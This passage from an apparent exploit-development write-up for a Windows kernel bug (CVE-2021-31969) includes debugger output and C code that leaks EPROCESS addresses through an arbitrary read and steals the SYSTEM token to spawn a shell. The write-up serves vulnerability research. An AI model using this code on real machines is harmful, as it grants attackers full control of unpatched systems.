 ffffd685bcbeb670 size:   e0 previous size:    0  (Allocated)  EtwR
*ffffd685bcbeb750 size:   e0 previous size:    0  (Allocated) *IoCo
		Pooltag IoCo : Io completion, Binary : nt!io
 ffffd685bcbeb830 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb910 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb9f0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebad0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebbb0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebc90 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebd70 size:   e0 previous size:    0  (Allocated)  IoCo
 ffffd685bcbebe50 size:   e0 previous size:    0  (Allocated)  EtwR

This is a good sign, because if the EtwR object can leak interesting pointers, it will be a consistent technique without the need to spray.

I continued to dump pointers on the EtwR objects.

7: kd> .foreach (addr {dps ffffd685`bcbeb140 La0}) {!object addr}
ffffd685bcbeb140: Not a valid object (ObjectType invalid)

ffffd685bcbeb148: Not a valid object (ObjectType invalid)
48: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb150: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
ffffd685bcbeb158: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb160: Not a valid object (ObjectType invalid)
Object: ffffd685bcd59140  Type: (ffffd685b7ebd380) Process
    ObjectHeader: ffffd685bcd59110 (new version)
    HandleCount: 6  PointerCount: 196453
ffffd685bcbeb168: Not a valid object (ObjectType invalid)
1: not a valid object (ObjectHeader invalid @ -offset 30)

7: kd> dq ffffd685bcbeb140
ffffd685`bcbeb140  000000d8`00000000 00000000`00000048
ffffd685`bcbeb150  fffff801`2726ad00 00000000`00000000
ffffd685`bcbeb160  ffffd685`bcd59140 00000000`00000001 <- EPROCESS
ffffd685`bcbeb170  00000000`00008000 00000000`00000001

Turns out that every EtwR object + 0x20(0x30 including chunk headers) contains an EPROCESS pointer, giving us the info leak required.

To summarize:

  • Search pool memory forward and backward from the SessionObject pointer until we find the byte pattern AlIn
  • Move backward by 4 bytes to locate the start of the AlIn allocation
  • This address +0x38 contains an IoCompletion object pointer
  • Again search pool memory for the byte pattern EtwR to locate the EtwR object allocation
  • This address +0x30 contains an EPROCESS pointer
BOOL LocateEPROCESSAddresses(int WnfIndex, HANDLE RwToken, ULONG_PTR TokenSessionObject, ULONG_PTR *OwnEproc, ULONG_PTR *SystemEproc)
{
    BOOL        status = FALSE;
    PBYTE       twoPageBuffer = NULL;
    DWORD       bufferSize = PAGE_SIZE * 2;
    BYTE        pageBuffer[PAGE_SIZE] = { 0 };
    DWORD       *cur = NULL;
    ULONG_PTR   allocationBase = NULL;
    ULONG_PTR   addrBuffer = NULL;
    ULONG64     dataBuffer = 0;
    PEPROCESS   eproc = NULL;

    twoPageBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
    if (!twoPageBuffer) {
        printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
        goto out;
    }

    status = ArbitraryRead(WnfIndex, RwToken, TokenSessionObject, twoPageBuffer, bufferSize);
    if (!status)
        goto out;

    cur = twoPageBuffer;
    for (int i = 0; i < bufferSize / sizeof(DWORD); i++) {
        if (cur[i] != 'nIlA')
            continue;

        // found tag, move back 0x4 bytes
        allocationBase = TokenSessionObject + ((ULONG64)&(cur[i-1]) - (ULONG64)twoPageBuffer);
        printf("[+] Found AlIn allocation at 0x%llx\n", allocationBase);

        status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x38, &addrBuffer, 0x8);
        if (!status || !addrBuffer)
            goto out;

        // found IoCompletion
        printf("[+] Found IoCompletion object at 0x%llx\n", addrBuffer);
        allocationBase = addrBuffer;

        status = ArbitraryRead(WnfIndex, RwToken, allocationBase, &pageBuffer, PAGE_SIZE);
        if (!status)
            goto out;

        // find EtwR tag
        cur = pageBuffer;
        for (int i = 0; i < PAGE_SIZE / sizeof(DWORD); i++) {
            if (cur[i] != 'RwtE')
                continue;

            // found tag, move back 0x4 bytes
            allocationBase += ((ULONG64)&(cur[i-1]) - (ULONG64)pageBuffer);

            // extract EPROCESS
            status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x30, &addrBuffer, 0x8);
            if (!status || !addrBuffer)
                goto out;

            if (addrBuffer < 0xffff000000000000) {
                puts("[-] Can't find EPROCESS");
                goto out;
            }

            // found EPROCESS
            printf("[+] Found EPROCESS object at 0x%llx\n", addrBuffer);
            eproc = (PEPROCESS)addrBuffer;

            do {
                status = ArbitraryRead(WnfIndex, RwToken, &eproc->UniqueProcessId, &dataBuffer, 0x8);
                if (!status)
                    goto out;

                if (dataBuffer == GetCurrentProcessId()) {
                    *OwnEproc = eproc;
                    printf("[+] Found own EPROCESS address: 0x%llx\n", eproc);
                }

                else if (dataBuffer == 0x4) {
                    *SystemEproc = eproc;
                    printf("[+] Found system EPROCESS address: 0x%llx\n", eproc);
                }

                if (*OwnEproc && *SystemEproc) {
                    status = TRUE;
                    goto out;
                }

                status = ArbitraryRead(WnfIndex, RwToken, &eproc->ActiveProcessLinks, &dataBuffer, 0x8);
                if (!status)
                    goto out;

                eproc = CONTAINING_RECORD(dataBuffer, EPROCESS, ActiveProcessLinks);
            } while (eproc != addrBuffer);
        }
    }

out:
    if (twoPageBuffer)
        HeapFree(GetProcessHeap(), 0, twoPageBuffer);

    return status;
}

Get Shell

Afterwards it’s just overwriting PreviousMode, stealing token, restoring PreviousMode and spawning shell.

BOOL StealToken(PEPROCESS OwnEproc, PEPROCESS SystemEproc)
{
    ULONG64 token = NULL;

    if (!NtArbitraryRead(&SystemEproc->Token, &token, 0x8))
        return FALSE;

    if (!NtArbitraryWrite(&OwnEproc->Token, &token, 0x8))
        return FALSE;

    return TRUE;
}

Exploit Success Rate

Through empirical evidence I conclude that the exploit works about 1 in 15 tries on average. A large proportion of the failed attempts actually successfully overwrote WNF objects, but they also overwrote the adjacent TOKEN objects, rendering the WNF object unusable. A way to improve success rate on this version of Windows would be to overwrite WNF sizes with a larger value, such as 0x3000. That way we can query for more potentially untouched TOKEN objects. However I believe WNF only allows a maximum write of 0x1000 on later Windows versions.

Post Exploitation

The exploit will crash the system once it exits, so we have to keep the process running.

This is because the system will try to follow the linked list of _TERMINATION_PORT objects to free each of them, but we’ve corrupted the list at some point. A way to fix this will be to terminate the list at the first object by reading _ETHREAD->TerminationPort, but this results in our spray objects never being freed and thus a memory leak. However, we’ve also corrupted VS subsegment headers, WNF and TOKEN objects along the way, which may all cause a crash at some point.

Empirically as long as we keep the process running, the system will be stable long enough to perform basic persistence activities.

Variants

CVE-2023-36036 patched this November stems from the same function HsmpRpiDecompressBuffer, and is reported to be actively exploited in the wild. Unlike the CVE-2021-31969 patch which restricts the minimum value cstmDataSize can take, this patch limits the maximum value of cstmDataSize to 0x4000, which is the maximum bytes HsmpRpReadBuffer would read. This suggests a possible OOB operation due to the previously uncapped size.

Acknowledgements

I would like to thank my mentor @linhlhq for patiently guiding and assisting me through the exploit development process. This work would not have been possible without his wisdom and experience.

References